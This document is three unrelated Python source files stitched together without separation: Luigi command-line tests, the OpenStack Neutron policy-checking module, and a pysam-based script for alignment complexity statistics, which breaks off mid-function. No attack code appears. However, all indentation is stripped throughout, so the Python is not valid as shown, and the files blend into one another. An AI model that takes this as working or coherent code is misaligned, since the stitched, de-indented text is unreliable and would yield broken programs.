# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import mock
import os
import subprocess
from helpers import unittest
from luigi import six
import luigi
from luigi.mock import MockTarget
class SomeTask(luigi.Task):
n = luigi.IntParameter()
def output(self):
return MockTarget('/tmp/test_%d' % self.n)
def run(self):
f = self.output().open('w')
f.write('done')
f.close()
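# The command-line tests below exercise this task, e.g.
# `luigi --local-scheduler --no-lock SomeTask --n 1000`, and then assert that
# MockTarget.fs holds '/tmp/test_1000' -> b'done'.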
class AmbiguousClass(luigi.Task):
pass
class AmbiguousClass(luigi.Task): # NOQA
pass
class TaskWithSameName(luigi.Task):
def run(self):
self.x = 42
class TaskWithSameName(luigi.Task): # NOQA
# there should be no ambiguity
def run(self):
self.x = 43
class WriteToFile(luigi.Task):
filename = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.filename)
def run(self):
f = self.output().open('w')
print('foo', file=f)
f.close()
class FooBaseClass(luigi.Task):
x = luigi.Parameter(default='foo_base_default')
class FooSubClass(FooBaseClass):
pass
class CmdlineTest(unittest.TestCase):
def setUp(self):
MockTarget.fs.clear()
@mock.patch("logging.getLogger")
def test_cmdline_main_task_cls(self, logger):
luigi.run(['--local-scheduler', '--no-lock', '--n', '100'], main_task_cls=SomeTask)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_100': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_local_scheduler(self, logger):
luigi.run(['SomeTask', '--no-lock', '--n', '101'], local_scheduler=True)
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_101': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_other_task(self, logger):
luigi.run(['--local-scheduler', '--no-lock', 'SomeTask', '--n', '1000'])
self.assertEqual(dict(MockTarget.fs.get_all_data()), {'/tmp/test_1000': b'done'})
@mock.patch("logging.getLogger")
def test_cmdline_ambiguous_class(self, logger):
self.assertRaises(Exception, luigi.run, ['--local-scheduler', '--no-lock', 'AmbiguousClass'])
@mock.patch("logging.getLogger")
@mock.patch("logging.StreamHandler")
def test_setup_interface_logging(self, handler, logger):
handler.return_value = mock.Mock(name="stream_handler")
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
luigi.interface.setup_interface_logging()
self.assertEqual([mock.call(handler.return_value)], logger.return_value.addHandler.call_args_list)
with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
if six.PY2:
error = ConfigParser.NoSectionError
else:
error = KeyError
self.assertRaises(error, luigi.interface.setup_interface_logging, '/blah')
@mock.patch("warnings.warn")
@mock.patch("luigi.interface.setup_interface_logging")
def test_cmdline_logger(self, setup_mock, warn):
with mock.patch("luigi.interface.core") as env_params:
env_params.return_value.logging_conf_file = None
luigi.run(['SomeTask', '--n', '7', '--local-scheduler', '--no-lock'])
self.assertEqual([mock.call(None)], setup_mock.call_args_list)
with mock.patch("luigi.configuration.get_config") as getconf:
getconf.return_value.get.side_effect = ConfigParser.NoOptionError(section='foo', option='bar')
getconf.return_value.getint.return_value = 0
luigi.interface.setup_interface_logging.call_args_list = []
luigi.run(['SomeTask', '--n', '42', '--local-scheduler', '--no-lock'])
self.assertEqual([], setup_mock.call_args_list)
@mock.patch('argparse.ArgumentParser.print_usage')
def test_non_existent_class(self, print_usage):
self.assertRaises(luigi.task_register.TaskClassNotFoundException,
luigi.run, ['--local-scheduler', '--no-lock', 'XYZ'])
@mock.patch('argparse.ArgumentParser.print_usage')
def test_no_task(self, print_usage):
self.assertRaises(SystemExit, luigi.run, ['--local-scheduler', '--no-lock'])
class InvokeOverCmdlineTest(unittest.TestCase):
def _run_cmdline(self, args):
env = os.environ.copy()
env['PYTHONPATH'] = env.get('PYTHONPATH', '') + ':.:test'
print('Running: ' + ' '.join(args)) # To simplify rerunning failing tests
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
stdout, stderr = p.communicate() # Unfortunately subprocess.check_output is 2.7+
return p.returncode, stdout, stderr
def test_bin_luigi(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['./bin/luigi', '--module', 'cmdline_test', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['python', 'test/cmdline_test.py', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_python_module(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['python', '-m', 'luigi', '--module', 'cmdline_test', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python_help(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', '--help-all'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_direct_python_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_bin_luigi_help(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', '--help-all'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_python_module_luigi_help(self):
returncode, stdout, stderr = self._run_cmdline(['python', '-m', 'luigi', '--module', 'cmdline_test', '--help-all'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_bin_luigi_help_no_module(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help'])
self.assertTrue(stdout.find(b'usage:') != -1)
def test_bin_luigi_help_not_spammy(self):
"""
Test that `luigi --help` fits on one screen
"""
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help'])
self.assertLessEqual(len(stdout.splitlines()), 15)
def test_bin_luigi_all_help_spammy(self):
"""
Test that `luigi --help-all` doesn't fit on a screen
Naturally, I don't mind this test breaking, but it convinces me that
the "not spammy" test is actually testing what it claims too.
"""
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help-all'])
self.assertGreater(len(stdout.splitlines()), 15)
def test_error_message_on_misspelled_task(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', 'RangeDaili'])
self.assertTrue(stderr.find(b'RangeDaily') != -1)
def test_bin_luigi_no_parameters(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi'])
self.assertTrue(stderr.find(b'No task specified') != -1)
def test_python_module_luigi_no_parameters(self):
returncode, stdout, stderr = self._run_cmdline(['python', '-m', 'luigi'])
self.assertTrue(stderr.find(b'No task specified') != -1)
def test_bin_luigi_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_python_module_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['python', '-m', 'luigi', '--module', 'cmdline_test', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_bin_luigi_options_before_task(self):
args = ['./bin/luigi', '--module', 'cmdline_test', '--no-lock', '--local-scheduler', '--FooBaseClass-x', 'hello', 'FooBaseClass']
returncode, stdout, stderr = self._run_cmdline(args)
self.assertEqual(0, returncode)
def test_bin_fail_on_unrecognized_args(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--no-lock', '--local-scheduler', 'Task', '--unknown-param', 'hiiii'])
self.assertNotEqual(0, returncode)
def test_deps_py_script(self):
"""
Test the deps.py script.
"""
args = 'python luigi/tools/deps.py --module examples.top_artists ArtistToplistToDatabase --date-interval 2015-W10'.split()
returncode, stdout, stderr = self._run_cmdline(args)
self.assertEqual(0, returncode)
self.assertTrue(stdout.find(b'[FileSystem] data/streams_2015_03_04_faked.tsv') != -1)
self.assertTrue(stdout.find(b'[DB] localhost') != -1)
def test_bin_mentions_misspelled_task(self):
"""
Test that the error message is informative when a task is misspelled.
In particular it should say that the task is misspelled and not that
the local parameters do not exist.
"""
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', 'HooBaseClass', '--x 5'])
self.assertTrue(stderr.find(b'FooBaseClass') != -1)
self.assertTrue(stderr.find(b'--x') != 0)
if __name__ == '__main__':
# Needed for one of the tests
luigi.run()
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Policy engine for neutron. Largely copied from nova.
"""
import itertools
import re
from oslo.config import cfg
from neutron.api.v2 import attributes
from neutron.common import exceptions
import neutron.common.utils as utils
from neutron import manager
from neutron.openstack.common import excutils
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import policy
LOG = logging.getLogger(__name__)
_POLICY_PATH = None
_POLICY_CACHE = {}
ADMIN_CTX_POLICY = 'context_is_admin'
# Maps deprecated 'extension' policies to new-style policies
DEPRECATED_POLICY_MAP = {
'extension:provider_network':
['network:provider:network_type',
'network:provider:physical_network',
'network:provider:segmentation_id'],
'extension:router':
['network:router:external'],
'extension:port_binding':
['port:binding:vif_type', 'port:binding:vif_details',
'port:binding:profile', 'port:binding:host_id']
}
DEPRECATED_ACTION_MAP = {
'view': ['get'],
'set': ['create', 'update']
}
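# Illustrative expansion (derived from the maps above and _set_rules below):
# a deprecated rule such as 'extension:provider_network:view' is rewritten as
# 'get_network:provider:network_type', 'get_network:provider:physical_network'
# and 'get_network:provider:segmentation_id', each keeping the original rule body.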
cfg.CONF.import_opt('policy_file', 'neutron.common.config')
def reset():
global _POLICY_PATH
global _POLICY_CACHE
_POLICY_PATH = None
_POLICY_CACHE = {}
policy.reset()
def init():
global _POLICY_PATH
global _POLICY_CACHE
if not _POLICY_PATH:
_POLICY_PATH = utils.find_config_file({}, cfg.CONF.policy_file)
if not _POLICY_PATH:
raise exceptions.PolicyFileNotFound(path=cfg.CONF.policy_file)
# pass _set_rules to read_cached_file so that the policy rules
# are reloaded only if the file has changed
utils.read_cached_file(_POLICY_PATH, _POLICY_CACHE,
reload_func=_set_rules)
def get_resource_and_action(action):
"""Extract resource and action (write, read) from api operation."""
data = action.split(':', 1)[0].split('_', 1)
return ("%ss" % data[-1], data[0] != 'get')
def _set_rules(data):
default_rule = 'default'
LOG.debug(_("Loading policies from file: %s"), _POLICY_PATH)
# Ensure backward compatibility with folsom/grizzly convention
# for extension rules
policies = policy.Rules.load_json(data, default_rule)
for pol in policies.keys():
if any([pol.startswith(depr_pol) for depr_pol in
DEPRECATED_POLICY_MAP.keys()]):
LOG.warn(_("Found deprecated policy rule:%s. Please consider "
"upgrading your policy configuration file"), pol)
pol_name, action = pol.rsplit(':', 1)
try:
new_actions = DEPRECATED_ACTION_MAP[action]
new_policies = DEPRECATED_POLICY_MAP[pol_name]
# bind new actions and policies together
for actual_policy in ['_'.join(item) for item in
itertools.product(new_actions,
new_policies)]:
if actual_policy not in policies:
# New policy, same rule
LOG.info(_("Inserting policy:%(new_policy)s in place "
"of deprecated policy:%(old_policy)s"),
{'new_policy': actual_policy,
'old_policy': pol})
policies[actual_policy] = policies[pol]
# Remove old-style policy
del policies[pol]
except KeyError:
LOG.error(_("Backward compatibility unavailable for "
"deprecated policy %s. The policy will "
"not be enforced"), pol)
policy.set_rules(policies)
def _is_attribute_explicitly_set(attribute_name, resource, target):
"""Verify that an attribute is present and has a non-default value."""
return ('default' in resource[attribute_name] and
attribute_name in target and
target[attribute_name] is not attributes.ATTR_NOT_SPECIFIED and
target[attribute_name] != resource[attribute_name]['default'])
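# Example (assuming the standard attribute map): for a network 'shared'
# attribute whose definition carries {'default': False}, a request body
# {'shared': True} makes this function return True, whereas omitting 'shared'
# or sending the default False returns False.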
def _build_subattr_match_rule(attr_name, attr, action, target):
"""Create the rule to match for sub-attribute policy checks."""
# TODO(salv-orlando): Instead of relying on validator info, introduce
# typing for API attributes
# Expect a dict as type descriptor
validate = attr['validate']
key = filter(lambda k: k.startswith('type:dict'), validate.keys())
if not key:
LOG.warn(_("Unable to find data type descriptor for attribute %s"),
attr_name)
return
data = validate[key[0]]
if not isinstance(data, dict):
LOG.debug(_("Attribute type descriptor is not a dict. Unable to "
"generate any sub-attr policy rule for %s."),
attr_name)
return
sub_attr_rules = [policy.RuleCheck('rule', '%s:%s:%s' %
(action, attr_name,
sub_attr_name)) for
sub_attr_name in data if sub_attr_name in
target[attr_name]]
return policy.AndCheck(sub_attr_rules)
def _build_match_rule(action, target):
"""Create the rule to match for a given action.
The policy rule to be matched is built in the following way:
1) add entries for matching permission on objects
2) add an entry for the specific action (e.g.: create_network)
3) add an entry for attributes of a resource for which the action
is being executed (e.g.: create_network:shared)
4) add an entry for sub-attributes of a resource for which the
action is being executed
(e.g.: create_router:external_gateway_info:network_id)
"""
match_rule = policy.RuleCheck('rule', action)
resource, is_write = get_resource_and_action(action)
# Attribute-based checks shall not be enforced on GETs
if is_write:
# assigning to variable with short name for improving readability
res_map = attributes.RESOURCE_ATTRIBUTE_MAP
if resource in res_map:
for attribute_name in res_map[resource]:
if _is_attribute_explicitly_set(attribute_name,
res_map[resource],
target):
attribute = res_map[resource][attribute_name]
if 'enforce_policy' in attribute:
attr_rule = policy.RuleCheck('rule', '%s:%s' %
(action, attribute_name))
# Build match entries for sub-attributes, if present
validate = attribute.get('validate')
if (validate and any([k.startswith('type:dict') and v
for (k, v) in
validate.iteritems()])):
attr_rule = policy.AndCheck(
[attr_rule, _build_subattr_match_rule(
attribute_name, attribute,
action, target)])
match_rule = policy.AndCheck([match_rule, attr_rule])
return match_rule
# This check is registered as 'tenant_id' so that it can override
# GenericCheck which was used for validating parent resource ownership.
# This will prevent us from having to handle backward compatibility
# for policy.json
# TODO(salv-orlando): Reinstate GenericCheck for simple tenant_id checks
@policy.register('tenant_id')
class OwnerCheck(policy.Check):
"""Resource ownership check.
This check verifies the owner of the current resource, or of another
resource referenced by the one under analysis.
In the former case it falls back to a regular GenericCheck, whereas
in the latter case it leverages the plugin to load the referenced
resource and perform the check.
"""
def __init__(self, kind, match):
# Process the match
try:
self.target_field = re.findall(r'^\%\((.*)\)s$',
match)[0]
except IndexError:
err_reason = (_("Unable to identify a target field from:%s."
"match should be in the form %%(<field_name>)s") %
match)
LOG.exception(err_reason)
raise exceptions.PolicyInitError(
policy="%s:%s" % (kind, match),
reason=err_reason)
super(OwnerCheck, self).__init__(kind, match)
def __call__(self, target, creds):
if self.target_field not in target:
# policy needs a plugin check
# target field is in the form resource:field
# however if they're not separated by a colon, use an underscore
# as a separator for backward compatibility
def do_split(separator):
parent_res, parent_field = self.target_field.split(
separator, 1)
return parent_res, parent_field
for separator in (':', '_'):
try:
parent_res, parent_field = do_split(separator)
break
except ValueError:
LOG.debug(_("Unable to find ':' as separator in %s."),
self.target_field)
else:
# If we are here split failed with both separators
err_reason = (_("Unable to find resource name in %s") %
self.target_field)
LOG.exception(err_reason)
raise exceptions.PolicyCheckError(
policy="%s:%s" % (self.kind, self.match),
reason=err_reason)
parent_foreign_key = attributes.RESOURCE_FOREIGN_KEYS.get(
"%ss" % parent_res, None)
if not parent_foreign_key:
err_reason = (_("Unable to verify match:%(match)s as the "
"parent resource: %(res)s was not found") %
{'match': self.match, 'res': parent_res})
LOG.exception(err_reason)
raise exceptions.PolicyCheckError(
policy="%s:%s" % (self.kind, self.match),
reason=err_reason)
# NOTE(salv-orlando): This check currently assumes the parent
# resource is handled by the core plugin. It might be worth
# having a way to map resources to plugins so to make this
# check more general
f = getattr(manager.NeutronManager.get_instance().plugin,
'get_%s' % parent_res)
# f *must* exist, if not found it is better to let neutron
# explode. Check will be performed with admin context
context = importutils.import_module('neutron.context')
try:
data = f(context.get_admin_context(),
target[parent_foreign_key],
fields=[parent_field])
target[self.target_field] = data[parent_field]
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Policy check error while calling %s!'), f)
match = self.match % target
if self.kind in creds:
return match == unicode(creds[self.kind])
return False
@policy.register('field')
class FieldCheck(policy.Check):
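# Handles policy expressions written as "field:<resource>:<field>=<value>",
# e.g. "field:networks:shared=True"; the policy parser registers this class
# for the 'field' kind, so __init__ receives the remainder
# 'networks:shared=True'. The value is converted with the attribute map's
# 'convert_to' helper when one is defined and then compared with the target.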
def __init__(self, kind, match):
# Process the match
resource, field_value = match.split(':', 1)
field, value = field_value.split('=', 1)
super(FieldCheck, self).__init__(kind, '%s:%s:%s' %
(resource, field, value))
# Value might need conversion - we need help from the attribute map
try:
attr = attributes.RESOURCE_ATTRIBUTE_MAP[resource][field]
conv_func = attr['convert_to']
except KeyError:
conv_func = lambda x: x
self.field = field
self.value = conv_func(value)
def __call__(self, target_dict, cred_dict):
target_value = target_dict.get(self.field)
# target_value might be a boolean, explicitly compare with None
if target_value is None:
LOG.debug(_("Unable to find requested field: %(field)s in "
"target: %(target_dict)s"),
{'field': self.field,
'target_dict': target_dict})
return False
return target_value == self.value
def _prepare_check(context, action, target):
"""Prepare rule, target, and credentials for the policy engine."""
# Compare with None to distinguish case in which target is {}
if target is None:
target = {}
match_rule = _build_match_rule(action, target)
credentials = context.to_dict()
return match_rule, target, credentials
def check(context, action, target, plugin=None, might_not_exist=False):
"""Verifies that the action is valid on the target in this context.
:param context: neutron context
:param action: string representing the action to be checked
this should be colon separated for clarity.
:param target: dictionary representing the object of the action
for object creation this should be a dictionary representing the
location of the object e.g. ``{'project_id': context.project_id}``
:param plugin: currently unused and deprecated.
Kept for backward compatibility.
:param might_not_exist: If True the policy check is skipped (and the
function returns True) if the specified policy does not exist.
Defaults to false.
:return: Returns True if access is permitted else False.
"""
if might_not_exist and not (policy._rules and action in policy._rules):
return True
return policy.check(*(_prepare_check(context, action, target)))
def enforce(context, action, target, plugin=None):
"""Verifies that the action is valid on the target in this context.
:param context: neutron context
:param action: string representing the action to be checked
this should be colon separated for clarity.
:param target: dictionary representing the object of the action
for object creation this should be a dictionary representing the
location of the object e.g. ``{'project_id': context.project_id}``
:param plugin: currently unused and deprecated.
Kept for backward compatibility.
:raises neutron.exceptions.PolicyNotAuthorized: if verification fails.
"""
rule, target, credentials = _prepare_check(context, action, target)
result = policy.check(rule, target, credentials, action=action)
if not result:
LOG.debug(_("Failed policy check for '%s'"), action)
raise exceptions.PolicyNotAuthorized(action=action)
return result
def check_is_admin(context):
"""Verify context has admin rights according to policy settings."""
init()
# the target is user-self
credentials = context.to_dict()
target = credentials
# Backward compatibility: if ADMIN_CTX_POLICY is not
# found, default to validating role:admin
admin_policy = (ADMIN_CTX_POLICY in policy._rules
and ADMIN_CTX_POLICY or 'role:admin')
return policy.check(admin_policy, target, credentials)
def _extract_roles(rule, roles):
if isinstance(rule, policy.RoleCheck):
roles.append(rule.match.lower())
elif isinstance(rule, policy.RuleCheck):
_extract_roles(policy._rules[rule.match], roles)
elif hasattr(rule, 'rules'):
for rule in rule.rules:
_extract_roles(rule, roles)
def get_admin_roles():
"""Return a list of roles which are granted admin rights according
to policy settings.
"""
# NOTE(salvatore-orlando): This function provides a solution for
# populating implicit contexts with the appropriate roles so that
# they correctly pass policy checks, and will become superseded
# once all explicit policy checks are removed from db logic and
# plugin modules. For backward compatibility it returns the literal
# admin if ADMIN_CTX_POLICY is not defined
init()
if not policy._rules or ADMIN_CTX_POLICY not in policy._rules:
return ['admin']
try:
admin_ctx_rule = policy._rules[ADMIN_CTX_POLICY]
except (KeyError, TypeError):
return
roles = []
_extract_roles(admin_ctx_rule, roles)
return roles
#!/usr/bin/env python
'''
The MIT License (MIT)
Copyright (c) <2016> <Mathias Lesche>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
contact: mat.lesche(at)gmail.com
'''
''' python modules '''
import logging
import pysam
from argparse import ArgumentParser
from argparse import ArgumentTypeError
from argparse import RawDescriptionHelpFormatter
from collections import defaultdict
from os import chmod
from os.path import join as pathjoin, isfile
from random import shuffle
from random import seed
from sys import stdin
from types import NoneType
''' own modules '''
from support.io_module import check_Directorylist
from support.io_module import add_Separator
from support.io_module import create_Directory
from support.io_module import check_Fileslist
from support.io_module import write_list
from support.main_logger import MainLogger
class Parser(object):
def __init__(self):
self.__parser = ArgumentParser(description="""
Script parses a given sam/bam file via -a or stdin and
calculates the number of new reference positions or fragments
in a subsample and the whole input. Data is written back
and can be visualised with an R script
""", formatter_class=RawDescriptionHelpFormatter)
self.initialiseParser()
self.__inputfile = ''
self.__display = -1
self.__bfxid = ''
self.__subsample = 1000000
self.__frags = False
self.__mapping = False
self.__complexity = False
self.__subset = ''
self.__logger = logging.getLogger('dsp.report.calc_FragComplexity')
self.parse()
def initialiseParser(self):
self.__parser.add_argument('-a', '--alignment', type=self.checkalignment, metavar='FILE', dest='input', nargs = '?', default = stdin, help="alignment file (default: stdin)")
self.__parser.add_argument('-b', '--bfx', type=str, metavar='STRING', dest='bfx', required = True , help="bfx id of the project")
self.__parser.add_argument('-i', '--intervalsize', type=int, metavar='INT', dest='subsample', default = 1000000, help="subsample size for complexity calculation (default: 1000000)")
self.__parser.add_argument("-f", "--fragment", dest = 'frags', action= 'store_true', help= 'run in fragment mode, standard is position mode')
self.__parser.add_argument("-m", "--mapping", dest = 'mapping', action= 'store_true', help= 'create mapping stats')
self.__parser.add_argument("-l", "--libcomplexity", dest = 'complexity', action= 'store_true', help= 'create library complexity stats')
# self.__parser.add_argument('-r', '--runmode', type=str, metavar='DIRECTORY', dest='runmode', default='se', choices = ['se', 'pe'], help='run in single-/end (se) or paired-end (pe)')
self.__parser.add_argument('-o', '--output', type=str, metavar='DIRECTORY', dest='output', required=True, help='output directory for table file')
self.__parser.add_argument('-s', '--subset', type=str, metavar='STRING', dest='subset', required = True, choices = ['Complete', 'Gene'], help='subset which is used for the complexity calculation (Complete, Gene)')
'''
method checks whether the input is a bam/sam file and returns a pysam object for it
@param infile: string
@return: pysam AlignmentFile
'''
def checkalignment(self, infile):
good, bad = check_Fileslist([infile])
goodfiles = [i for i in good if i.endswith(('bam', 'sam'))]
badfiles = [i for i in good if not i.endswith(('bam', 'sam'))]
badfiles.extend(bad)
msg = 'check the input file'
if len(badfiles) != 0:
raise ArgumentTypeError(msg)
if len(goodfiles) != 1:
raise ArgumentTypeError(msg)
if goodfiles[0].endswith('bam'):
return pysam.AlignmentFile(goodfiles[0], 'rb')
else:
return pysam.AlignmentFile(goodfiles[0], 'r')
def parse(self, inputstring = None):
if isinstance(inputstring, NoneType):
self.__options = self.__parser.parse_args()
else:
self.__options = self.__parser.parse_args(inputstring)
def show_log(self, level, message):
if level == 'debug':
self.__logger.debug(message)
elif level == 'info':
self.__logger.info(message)
elif level == 'warning':
self.__logger.warning(message)
elif level == 'error':
self.__logger.error(message)
elif level == 'critical':
self.__logger.critical(message)
'''
method checks whether the output directory exists
'''
def check_output(self):
output = self.__options.output
good = check_Directorylist((output, ))[0]
if len(good) != 1:
self.show_log('error', "check output directory: {0}".format(output))
exit(2)
self.__output = good[0]
def main(self):
self.check_output()
self.__subset = self.__options.subset
self.__bfxid = self.__options.bfx
self.__frags = self.__options.frags
self.__mapping = self.__options.mapping
self.__complexity = self.__options.complexity
self.__inputfile = self.__options.input
if isinstance(self.__inputfile, file):
try:
self.__inputfile = pysam.AlignmentFile('-')
except ValueError:
self.show_log('error', 'Check if input is bam/sam')
exit(2)
self.__subsample = self.__options.subsample
if self.__subsample == 0 or self.__subsample % 10000 != 0:
self.show_log('error', 'Subsample size (-i) should be > 0 and a multiple of 10,000')
exit(2)
if not self.__mapping and not self.__complexity:
self.show_log('error', '(-m) or (-l) option is required')
exit(2)
def get_inputfile(self):
return self.__inputfile
def get_bfx(self):
return self.__bfxid
def get_subset(self):
return self.__subset
def get_complexity(self):
return self.__complexity
def get_output(self):
return self.__output
def get_subsample(self):
return self.__subsample
def get_frags(self):
return self.__frags
def get_mapping(self):
return self.__mapping
bfx = property(get_bfx, None, None, None)
subset = property(get_subset, None, None, None)
output = property(get_output, None, None, None)
subsample = property(get_subsample, None, None, None)
mappingstats = property(get_mapping)
inputfile = property(get_inputfile)
frags = property(get_frags, None, None, None)
complexity = property(get_complexity)
class CalcComplexity(object):
def __init__(self, inputfile, output, bfx, stepsize, fragmode, mappingstat, subset, complexity):
seed(42)
self.__inputfile = inputfile
self.__output = output
self.__bfx = bfx
self.__stepsize = stepsize
self.__fragmode = fragmode
self.__mappingstat = mappingstat
self.__subset = subset
self.__complexity = complexity
self.__rgdict = defaultdict(dict)
self.__logger = logging.getLogger('dsp.report.calc_FragComplexity')
self.__aligner = []
self.__headercomplex = 'Subsample\tUnique\tUniqPerc\tNew\tNewPerc\tLibrary\tSample\tReadgroup\tType\tAligner\tLevel\n'
self.__headermapping = 'Library\tSample\tReadgroup\tType\tFragments\tPercentage\tString\tAligner\tLevel\n'
self.get_libsample()
self.get_alignmentprog()
self.__complexoutputfile = pathjoin(self.__output, '{0}_{1}_alignment_complexity.csv'.format(self.__bfx, '_'.join(self.__rgdict.keys())))
self.__alignoutputfile = pathjoin(self.__output, '{0}_{1}_alignment_stats.csv'.format(self.__bfx, '_'.join(self.__rgdict.keys())))
def show_log(self, level, message):
if level == 'debug':
self.__logger.debug(message)
elif level == 'info':
self.__logger.info(message)
elif level == 'warning':
self.__logger.warning(message)
elif level == 'error':
self.__logger.error(message)
elif level == 'critical':
self.__logger.critical(message)
def get_libsample(self):
try:
for entry in self.__inputfile.header['RG']:
lib, sample, ids = entry['LB'], entry['SM'], entry['ID']
self.__rgdict[ids]['libid'] = (lib, sample)
self.__rgdict[ids]['processed'] = 0
self.__rgdict[ids]['aligned'] = 0
self.__rgdict[ids]['uniq'] = 0
self.__rgdict[ids]['list'] = []
self.__rgdict[ids]['coordlist'] = []
self.show_log('info', 'Found read group ID: {0} - Lib: {1} - Sample: {2}'.format(ids, lib, sample))
except KeyError:
self.show_log('warning', 'No read group ID was found, set to "none"')
self.__rgdict['none']['libid'] = ('none', 'none')
self.__rgdict['none']['processed'] = 0
self.__rgdict['none']['aligned'] = 0
self.__rgdict['none']['uniq'] = 0
self.__rgdict['none']['list'] = []
self.__rgdict['none']['coordlist'] = []
def get_alignmentprog(self):
pgs = self.__inputfile.header['PG']
for i in pgs:
if i['PN'].lower() == 'gsnap':
self.show_log('info', 'Aligner is: {0}'.format(i['PN']))
self.__aligner.append('gsnap')
elif i['PN'].lower() == 'bwa':
self.show_log('info', 'Aligner is: {0}'.format(i['PN']))
self.__aligner.append('bwa')
if len(self.__aligner) == 0:
self.show_log('info', 'No aligner found, using NH tags to define unique fragments')
self.__aligner = 'gsnap'
elif len(self.__aligner) > 1:
self.show_log('info', 'Multiple aligners found, using NH tags to define unique fragments')
self.__aligner = 'gsnap'
else:
self.__aligner = self.__aligner[0].lower()
'''
the step value is formatted into a string that shows the number of millions
@param number: int
@return: string
'''
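# e.g. with the default stepsize of 1,000,000: get_stepsize(2500000) -> '2.5'
# and get_stepsize(12500000) -> '12.5'; with a stepsize below 100,000 one more
# decimal is kept, e.g. get_stepsize(2500000) -> '2.50'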
def get_stepsize(self, number):
number = str(number)
length = len(str(number))
if self.__stepsize < 100000:
if length == 5:
return '0.0{0}'.format(number[0])
elif length == 6:
return '0.{0}'.format(number[0:2])
elif length == 7:
return '{0}.{1}'.format(number[0], number[1:3])
elif length == 8:
return '{0}.{1}'.format(number[:2], number[2:4])
elif length == 9:
return '{0}.{1}'.format(number[:3], number[3:5])
elif length == 10:
return '{0}.{1}'.format(number[:4], number[4:6])
else:
if length == 6:
return '0.{0}'.format(number[0])
elif length == 7:
return '{0}.{1}'.format(number[0], number[1])
elif length == 8:
return '{0}.{1}'.format(number[:2], number[2])
elif length == 9:
return '{0}.{1}'.format(number[:3], number[3])
elif length == 10:
